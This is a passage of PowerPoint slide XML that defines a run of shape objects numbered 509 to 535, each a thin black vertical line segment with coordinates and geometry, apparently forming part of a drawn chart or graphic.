                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="267098"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="object 509"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7717145" y="5204683"/>
            <a:ext cx="1258" cy="528506"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="266700">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="266275"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="object 510"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7745325" y="5249727"/>
            <a:ext cx="0" cy="483206"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="243839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="243544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="object 511"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7745052" y="5249426"/>
            <a:ext cx="2517" cy="483206"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="243839">
                <a:moveTo>
                  <a:pt x="1244" y="243420"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="243420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243696"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="object 512"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7772684" y="5285120"/>
            <a:ext cx="0" cy="447972"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="226060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="225679"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="513" name="object 513"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7771865" y="5283157"/>
            <a:ext cx="1258" cy="449230"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="226694">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="226675"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="object 514"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7800536" y="5325884"/>
            <a:ext cx="0" cy="406445"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="205105">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="205107"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="object 515"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7800263" y="5325004"/>
            <a:ext cx="2517" cy="407705"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="205739">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="205557"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="object 516"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7828442" y="5371467"/>
            <a:ext cx="0" cy="361146"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="182244">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="182106"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="object 517"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7826527" y="5374694"/>
            <a:ext cx="2517" cy="358629"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="180975">
                <a:moveTo>
                  <a:pt x="0" y="180206"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="180206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="180482"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="object 518"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7856296" y="5415962"/>
            <a:ext cx="0" cy="317104"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="160019">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="159657"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="object 519"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7856024" y="5418388"/>
            <a:ext cx="1258" cy="314587"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="158750">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="158433"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="object 520"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7884201" y="5452408"/>
            <a:ext cx="0" cy="280612"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="141605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="141266"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="object 521"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7883929" y="5452653"/>
            <a:ext cx="3775" cy="280612"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="141605">
                <a:moveTo>
                  <a:pt x="1374" y="140866"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1374" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="140866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="141142"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="object 522"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7912107" y="5473353"/>
            <a:ext cx="0" cy="259220"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="130810">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="130691"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="object 523"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7911288" y="5473856"/>
            <a:ext cx="1258" cy="259220"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="130810">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="130442"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="object 524"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7939414" y="5517303"/>
            <a:ext cx="0" cy="215178"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="108585">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="108518"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="object 525"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7939141" y="5517303"/>
            <a:ext cx="2517" cy="215178"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="108585">
                <a:moveTo>
                  <a:pt x="974" y="108242"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="108242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="108518"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="object 526"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7967320" y="5547880"/>
            <a:ext cx="0" cy="184977"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="93344">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="93082"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="object 527"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7965663" y="5548683"/>
            <a:ext cx="2517" cy="183719"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="92710">
                <a:moveTo>
                  <a:pt x="0" y="92406"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="92406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="92682"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="object 528"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7995225" y="5565566"/>
            <a:ext cx="0" cy="167360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="84455">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="84163"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="object 529"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7994953" y="5568291"/>
            <a:ext cx="1258" cy="164844"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="83185">
                <a:moveTo>
                  <a:pt x="400" y="82512"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400" y="82512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="82788"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="object 530"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8023078" y="5587562"/>
            <a:ext cx="0" cy="145968"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="73660">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="73063"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="object 531"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8020339" y="5589985"/>
            <a:ext cx="2517" cy="143452"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="72389">
                <a:moveTo>
                  <a:pt x="0" y="71564"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="71564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="71840"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="object 532"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8050985" y="5612777"/>
            <a:ext cx="0" cy="119543"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="60325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="60334"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="object 533"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8050412" y="5613280"/>
            <a:ext cx="1258" cy="119543"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="60325">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="60085"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="object 534"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8078565" y="5682471"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="50337">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="object 535"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
